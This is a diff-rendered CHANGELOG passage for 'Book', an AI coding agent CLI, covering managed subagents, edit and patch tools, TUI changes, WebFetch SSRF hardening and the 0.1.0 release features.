- Whitespace-tolerant Edit/MultiEdit recovery: trailing-whitespace and uniform-indent-shift
|
|
2306
|
+
relaxations apply only on a unique match, re-indent the replacement (rejecting matches whose
|
|
2307
|
+
replacement cannot shift consistently), annotate the result, never apply to `replaceAll`, and
|
|
2308
|
+
yield to the event loop with abort support on large files.
|
|
2309
|
+
- An advisory identical-retry circuit breaker that appends escalated guidance to the tool's own
|
|
2310
|
+
remediation when a call repeats with the same arguments and error (retryable transient failures
|
|
2311
|
+
exempt), plus structured remediation now rendered into model-facing error text as `Fix:` lines —
|
|
2312
|
+
preserved even when oversized errors are clipped.
|
|
2313
|
+
- Per-session tool call/failure counters surfaced in `/usage` (text report and TUI card, with
|
|
2314
|
+
totals and failing tools listed first). Only real errors and timeouts count as failures; user
|
|
2315
|
+
denials, plan-mode blocks, and cancellations do not.
|
|
2316
|
+
- `npm run eval:edit` — a deterministic edit-reliability eval (~25 fixture tasks) run against the
|
|
2317
|
+
configured model via the SDK, reporting per-task results to `.book/reports/`.
|
|
2318
|
+
- Bounded, session-wide concurrent execution for explicitly reviewed read-only file and Git tools,
|
|
2319
|
+
with ordered serial barriers, all-settled sibling results, duplicate-call rejection, and shared
|
|
2320
|
+
root/managed-child scheduling.
|
|
2321
|
+
- Codex-style `AGENTS.md` project-instruction discovery alongside the existing Claude-style
|
|
2322
|
+
`CLAUDE.md` and `.claude/rules` loader.
|
|
2323
|
+
- Resilient managed-agent persistence with fsynced atomic writes, bounded Windows contention
|
|
2324
|
+
retries, per-target locks, process leases, orphan-temp recovery, background coalescing, typed
|
|
2325
|
+
retryable tool failures, and non-modal degraded/recovered storage events.
|
|
2326
|
+
- A clear 30-day local retention policy for expired sessions and rotated debug logs; the active
|
|
2327
|
+
session and current debug log are always preserved.
|
|
2328
|
+
- Canonical `ApplyPatch` file mutation with exact contextual hunks, LF/CRLF and BOM preservation,
|
|
2329
|
+
multi-file staging, atomic verification, rollback, per-file artifacts, legacy permission/hook
|
|
2330
|
+
compatibility, and the `apply_patch` provider alias.
|
|
2331
|
+
- Native `rg` streaming for `Grep`, bounded `WebFetch`/`WebSearch` responses, rotating debug logs, terminal-shell TTL/cap cleanup, and the explicit `DismissShell` action.
|
|
2332
|
+
- Claude Code-style queued follow-up input: Enter queues while a turn is running, Up recalls the newest queued message, Enter resubmits edits, and Esc cancels queue editing without interrupting the active turn.
|
|
2333
|
+
- Repeatable `bench:runtime` coverage for snapshots, sessions, search, Grep, context construction, streaming updates, and retained resources.
|
|
2334
|
+
- Managed-agent hardening with an outstanding spawn cap, paginated `AgentRead` result recovery, context-budgeted and idempotent completion delivery, bounded retries, per-record version-3 persistence, managed Git artifact cleanup, and per-run telemetry generations.
|
|
2335
|
+
- Claude-style managed-agent contracts: purpose-named runs distinct from reusable profiles, durable automatic parent completion delivery, semantic lifecycle rows, a prompt-adjacent `/tasks` panel, resumable child transcripts, version-2 state migration, profile model resolution, compact lifecycle projections, advisory three-query Explore routing, actionable permission errors, multi-host runtime events, read-only non-Git Explore, and explicit third-party agent import previews.
|
|
2336
|
+
- Claude-style inline managed-agent activity blocks: live child tool calls in the main transcript, compact `+N tool uses` overflow, bounded realtime result previews, and full-history child detail navigation.
|
|
2337
|
+
- Provider-neutral `ToolSearch` with adaptive eager/deferred exposure, fuzzy catalog metadata, next-turn activation, MCP namespace discovery, and session-scoped LRU retention.
|
|
2338
|
+
- A breaking ToolResult V2 contract for provider content, machine-readable data, actionable errors, metrics, artifacts, pagination, and TUI presentation. Persisted pre-V2 session results are upgraded while loading.
|
|
2339
|
+
- Adaptive managed agents with built-in explorer/patcher/validator profiles, three-worker scheduling, resumable persisted transcripts, background lifecycle controls, and TUI/SDK/headless interfaces.
|
|
2340
|
+
- Synthetic Git snapshots and per-agent worktrees that preserve dirty parent state, automatically commit patcher deltas, and atomically reject drift or conflicts.
|
|
2341
|
+
- Typed evidence publishing and independent validator verdicts; `AgentApply` accepts only the exact candidate commit linked to a pass verdict.
|
|
2342
|
+
- Named `Check` commands from `agents.checks` or standard package scripts, plus local paired evaluation metrics for `--agents off` versus `--agents adaptive`.
|
|
2343
|
+
- Structured `AskUserQuestion` clarification flow with a step-by-step TUI wizard, free-text answers, SDK callbacks, stream-json observability, and root/subagent source attribution.
|
|
2344
|
+
- Claude Code-style `/effort` command with direct level selection, a dedicated keyboard picker, model capability restrictions, and project-local default persistence.
|
|
2345
|
+
- Reference-aware compact checkpoints retain a token-budgeted exact recent tail, grounded historical constraints, task episodes, and freshness-checked file observations.
|
|
2346
|
+
- Bounded `SessionHistorySearch` / `SessionHistoryRead` tools recover compacted-away evidence through stable current-session references.
|
|
2347
|
+
- Claude-style `/rewind` with a two-stage prompt/action picker, append-only conversation branching, content-addressed workspace checkpoints, Git HEAD drift protection, transactional rollback, and temporary storage under `--no-session-persistence`.
|
|
2348
|
+
|
|
2349
|
+
### Changed
|
|
2350
|
+
|
|
2351
|
+
- Detailed tool rows now keep raw call parameter lists out of both visual and screen-reader
|
|
2352
|
+
transcripts while retaining concise summaries and result output.
|
|
2353
|
+
- Documentation now reflects the current proprietary/source-distributed package status, shipped
|
|
2354
|
+
CLI and runtime surfaces, open security boundaries, and implementation status of historical
|
|
2355
|
+
roadmap documents.
|
|
2356
|
+
- `WebFetch` now returns structured provenance and Markdown/text/sanitized-HTML formats, uses a
|
|
2357
|
+
real HTML parser, preserves bounded complete output through the shared tool-output path, rejects
|
|
2358
|
+
binary content, and treats its legacy `prompt` argument as metadata instead of claiming to
|
|
2359
|
+
perform extraction. `WebSearch` now works without configuration through a built-in Exa MCP
|
|
2360
|
+
provider with a fixed endpoint, bounded responses, and result/domain/recency/country controls.
|
|
2361
|
+
- Web tools are explicitly parallel-safe but remain permission-gated network operations, including
|
|
2362
|
+
in plan mode. Remembered fetch approval is scoped to the URL origin; cross-origin redirects must
|
|
2363
|
+
be fetched as a separately approved call.
|
|
2364
|
+
- Improved TUI streaming responsiveness by batching first-turn updates at a sustainable cadence,
|
|
2365
|
+
avoiding idle accumulator wakeups, and limiting the active transcript window to the available
|
|
2366
|
+
terminal height while output is streaming. Live Markdown now uses a bounded plain-text tail and
|
|
2367
|
+
defers full decoration until completion.
|
|
2368
|
+
- Smoothed mouse-wheel history navigation with three-row wheel steps, low-latency event-loop
|
|
2369
|
+
coalescing, isolated transcript content, and support for coalesced terminal reports.
|
|
2370
|
+
- Reduced managed-agent render fan-out, bounded completed transcript hydration with keyboard/mouse
|
|
2371
|
+
history expansion, accelerated terminal-width measurement, and batched noisy render diagnostics.
|
|
2372
|
+
|
|
2373
|
+
- BYOK providers and the active model selection now persist to the user-global `~/.book/settings.json`
|
|
2374
|
+
instead of the per-project `.book/settings.local.json`, so a provider added in one folder (its
|
|
2375
|
+
credentials, model catalog, and default model) is shared across every project rather than
|
|
2376
|
+
re-entered per folder. Provider removal (`Alt+D` in `/model` / `/providers`) targets the global
|
|
2377
|
+
file, and removable rows are labeled `[BYOK]` (previously `[local BYOK]`). Saving a model or
|
|
2378
|
+
provider also clears any stale same-key override from the current folder's
|
|
2379
|
+
`.book/settings.local.json` (which would otherwise shadow the new global value), so an
|
|
2380
|
+
already-used folder picks up the global choice immediately. Existing per-project provider entries
|
|
2381
|
+
are still read via the layered resolver but are no longer managed from the picker.
|
|
2382
|
+
- **Breaking:** `Edit`/`MultiEdit`/`NotebookEdit` — and `Write` over an existing file — now require
|
|
2383
|
+
the file to have been Read or `@`-mentioned in the session first (`file_not_observed`);
|
|
2384
|
+
previously only staleness after an observation was checked. `ApplyPatch` is exempt (context
|
|
2385
|
+
hunks self-anchor), contexts without an observation ledger are unaffected, observation keys are
|
|
2386
|
+
case-folded on Windows, and child agents inherit a copy of the parent's observations.
|
|
2387
|
+
- `ApplyPatch` is no longer described as the universally preferred mutation tool; the preference is
|
|
2388
|
+
model-conditional (see Added) and tool descriptions are neutral.
|
|
2389
|
+
- Tool concurrency is now an explicit policy rather than an idempotence side effect; preparation,
|
|
2390
|
+
hooks, permission prompts, interactive tools, mutations, shell commands, and lifecycle actions
|
|
2391
|
+
remain serial by default.
|
|
2392
|
+
- Strengthened the stable agent system prompt with end-to-end persistence, evidence-first tool
|
|
2393
|
+
use, failed-call recovery, tighter scope control, behavior-level verification, final diff review,
|
|
2394
|
+
and explicit authorization scope.
|
|
2395
|
+
- Session discovery now uses an atomic metadata index with linear JSONL replay and shared search/read indexes; rewind snapshots cache unchanged files, deduplicate manifest entry sets, and exclude workspace-local `.book/` state by default.
|
|
2396
|
+
- Static prompt discovery, tool schema estimates, Git context, and streaming transcript projection are cached or incrementally updated, with adaptive flushing and a bounded streaming transcript window.
|
|
2397
|
+
- Legacy permission migration runs during explicit startup, records a migration marker, skips identical settings writes, and serializes cross-process settings mutations.
|
|
2398
|
+
- Replaced the separate Agent Center and profile tab with Claude Code's in-session task workflow: a flat `main`-plus-children panel below the prompt, empty-prompt Tab to cycle focus straight into each child's transcript (wrapping back to `main`), `/tasks` for explicit management, `x` to stop or dismiss, and Esc to return.
|
|
2399
|
+
- New sessions receive a short title from their first prompt, and the TUI shows session names instead of internal UUIDs.
|
|
2400
|
+
- Provider visibility, system-prompt tool summaries, command/skill capabilities, role restrictions, permission modes, runtime availability, and execution now share one resolved tool surface.
|
|
2401
|
+
- Tool schemas are closed and centrally validated; model-visible sandbox bypass, backend selection, and generic timeout controls moved back to host configuration.
|
|
2402
|
+
- Managed agents are enabled by default in adaptive mode; use `--agents manual` for explicit-only delegation or `--agents off` for the single-agent baseline.
|
|
2403
|
+
- Agent definition tool lists are now strict capabilities: missing/empty denies all tools, `*` explicitly inherits, argument globs are enforced at execution, and user-question/MCP/lifecycle tools are never injected implicitly.
|
|
2404
|
+
- Redesigned the interactive TUI with matched quiet-editorial dark/light themes, a compact BOOK bookplate, inset user cards, open assistant typography, tree-style tool activity, a floating rounded composer, and softer picker/approval surfaces.
|
|
2405
|
+
- Compaction now replaces only active model context. The append-only transcript and chronological compact boundaries remain visible, scrollable, and resumable.
|
|
2406
|
+
- `/context` reports visible transcript size separately from active provider context.
|
|
2407
|
+
|
|
2408
|
+
### Security
|
|
2409
|
+
|
|
2410
|
+
- Hardened `WebFetch` against SSRF and DNS rebinding by requiring HTTPS unless explicitly enabled,
|
|
2411
|
+
rejecting embedded credentials and local/private/special-use destinations, validating every DNS
|
|
2412
|
+
result again at connection time, manually bounding redirects, and refusing cross-origin redirect
|
|
2413
|
+
hops. Dangerous HTTP/private-network exceptions require explicit host environment opt-in.
|
|
2414
|
+
- Managed snapshots include non-ignored untracked files in the local Git object database by default. Ignore secrets or set `agents.includeUntrackedInSnapshot` to `false` before delegation.
|
|
2415
|
+
- Rewind snapshots intentionally include hidden, gitignored, and secret-like workspace files for complete local restoration, but keep file contents out of session JSON, logs, and model context; `.git` and workspace-local `.book/` state are excluded by default.
|
|
2416
|
+
|
|
2417
|
+
### Fixed
|
|
2418
|
+
|
|
2419
|
+
- Show a lightweight placeholder (or the live stream) instead of the main welcome screen when opening a child transcript that has not produced output yet.
|
|
2420
|
+
- Queue concurrent permission requests instead of superseding earlier prompts, propagate
|
|
2421
|
+
cancellation into foreground shell processes, and give aborted tools a bounded cooperative
|
|
2422
|
+
teardown window before releasing their execution slot.
|
|
2423
|
+
- Use a 64,000-token output fallback for models without published output metadata instead of consuming the entire fallback context window.
|
|
2424
|
+
- Prevent context-window failures from oversized tool output by skipping binary `Grep` inputs, bounding search and generic tool results, preflighting complete provider requests, and compacting or clipping once before retrying recognized overflow errors.
|
|
2425
|
+
- Apply interactive permission-mode changes immediately to the active agent loop.
|
|
2426
|
+
- Keep mouse-wheel transcript scrolling while allowing terminal copy with Shift+drag.
|
|
2427
|
+
- Reconcile transcript height after descendant-local updates so throttled Markdown remains reachable
|
|
2428
|
+
without restoring per-wheel full-content measurement.
|
|
2429
|
+
- Deliver completed and failed subagent reports to the parent before automatically removing their terminal rows from the prompt-adjacent task panel.
|
|
2430
|
+
- Prevent the first submitted TUI message from freezing during a cold rewind snapshot by yielding filesystem checkpoint work and rendering the optimistic turn first.
|
|
2431
|
+
- Make `/theme` open a keyboard picker, apply the full app palette, persist the selection, resolve terminal auto mode correctly, and report invalid custom themes.
|
|
2432
|
+
- Keep local slash-command output visible and resumable in the TUI without adding it to provider or compaction context.
|
|
2433
|
+
- Add breathing room between transcript actions, keep general completed output collapsed, and show complete file-mutation diffs under Codex-style grouped file summaries with per-file collapse controls.
|
|
2434
|
+
|
|
2435
|
+
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/),
|
|
2436
|
+
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
|
|
2437
|
+
|
|
2438
|
+
## [0.1.0] - 2026-07-14
|
|
2439
|
+
|
|
2440
|
+
First public-ready release of Book, a provider-agnostic AI coding agent CLI with a Claude Code-style terminal UI.
|
|
2441
|
+
|
|
2442
|
+
### Added
|
|
2443
|
+
|
|
2444
|
+
#### Core agent
|
|
2445
|
+
|
|
2446
|
+
- Agent loop with multi-turn tool use, mid-stream abort (`Esc`), and context compaction (`/compact`)
|
|
2447
|
+
- Anthropic Messages API provider (SSE streaming, prompt caching, adaptive thinking, `--effort`)
|
|
2448
|
+
- OpenAI-compatible provider with auto-detect from `baseUrl`, retries, and usage tracking
|
|
2449
|
+
- BYOK provider setup and model filtering in the TUI
|
|
2450
|
+
- Two-zone system prompt (cacheable static prefix + dynamic per-turn suffix)
|
|
2451
|
+
- Session persistence (JSONL) with `--resume`, `--continue`, `--session-id`, `--fork-session`
|
|
2452
|
+
- Headless/print mode (`-p`) with `text` / `json` / `stream-json` output
|
|
2453
|
+
- Structured output via `--json-schema`
|
|
2454
|
+
- Optional stream-json enrichments: hook events, partial messages, prompt suggestions
|
|
2455
|
+
|
|
2456
|
+
#### Tools
|
|
2457
|
+
|
|
2458
|
+
- File tools: `Read`, `Write`, `Edit`, `MultiEdit`, `Glob`, `Grep`, `NotebookEdit`
|
|
2459
|
+
- Shell: `Bash` with `run_in_background`, `BashOutput`, `KillShell`
|
|
2460
|
+
- Git tools and unified diff rendering
|
|
2461
|
+
- Web: `WebFetch`, `WebSearch`
|
|
2462
|
+
- Task tools: `TaskCreate`, `TaskList`, `TaskGet`, `TaskUpdate`, `TaskStop`
|
|
2463
|
+
- Plan mode: `EnterPlanMode`, `ExitPlanMode` with host approval gate
|
|
2464
|
+
- Skills (`InvokeSkill`) and subagent `Task` delegation
|
|
2465
|
+
- MCP client (stdio transport)
|
|
2466
|
+
|
|
2467
|
+
#### Project context & memory
|
|
2468
|
+
|
|
2469
|
+
- CLAUDE.md / rules tree walk (user → project → local → `.claude/rules`)
|
|
2470
|
+
- Auto-memory store under `~/.book/projects/<project>/memory/` with approval inbox
|
|
2471
|
+
- Secret detection before memory writes
|
|
2472
|
+
- Skills, slash commands, and subagents discovered from `.book/`
|
|
2473
|
+
|
|
2474
|
+
#### TUI
|
|
2475
|
+
|
|
2476
|
+
- Ink/React interactive UI with welcome banner and status line
|
|
2477
|
+
- Markdown rendering (tables, code, syntax highlighting)
|
|
2478
|
+
- Transparent tool-call display; collapse long tool output; Claude-style edit summaries
|
|
2479
|
+
- `@file` mentions with fuzzy autocomplete (Tab / Enter)
|
|
2480
|
+
- Slash-command palette with fuzzy search and categories
|
|
2481
|
+
- Permission prompts with six modes and persistent allow/deny rules
|
|
2482
|
+
- Responsive layout, Static message handoff, scrollback stability work
|
|
2483
|
+
- Model picker and BYOK provider setup flow
|
|
2484
|
+
- Debug instrumentation via `BOOK_DEBUG*` flags
|
|
2485
|
+
|
|
2486
|
+
#### CLI & config
|
|
2487
|
+
|
|
2488
|
+
- Layered settings: `~/.book/settings.json` → `.book/settings.json` → `.book/settings.local.json` → `--settings`
|
|
2489
|
+
- `book doctor` and `book config` subcommands
|
|
2490
|
+
- Built-in slash commands including `/help`, `/model`, `/config`, `/permissions`, `/memory`, `/cost`, `/usage`, `/context`, `/diff`, `/export`, `/skills`, `/review`, `/security-review`, `/release-notes`, `/feedback`, `/init`
|
|
2491
|
+
- Permission modes: default, acceptEdits, plan, auto, dontAsk, bypassPermissions
|
|
2492
|
+
- Optional bubblewrap sandbox and lifecycle hooks (JSON-over-stdio)
|
|
2493
|
+
|
|
2494
|
+
#### SDK
|
|
2495
|
+
|
|
2496
|
+
- Programmatic `query()` generator export for embedding Book in other tools
|
|
2497
|
+
|
|
2498
|
+
### Notes
|
|
2499
|
+
|
|
2500
|
+
- npm package name `book` is already taken on the public registry; this release is distributed via GitHub only.
|
|
2501
|
+
- One ConPTY-based TUI integration test can flake under full parallel load on Windows; it passes in isolation.
|
|
2502
|
+
- See [`MILESTONES.md`](./MILESTONES.md) for remaining Phase 1 parity work (LSP, more CLI flags, vim mode, etc.).
|
|
2503
|
+
|
|
2504
|
+
[0.1.0]: https://github.com/letrquan/book/releases/tag/v0.1.0
|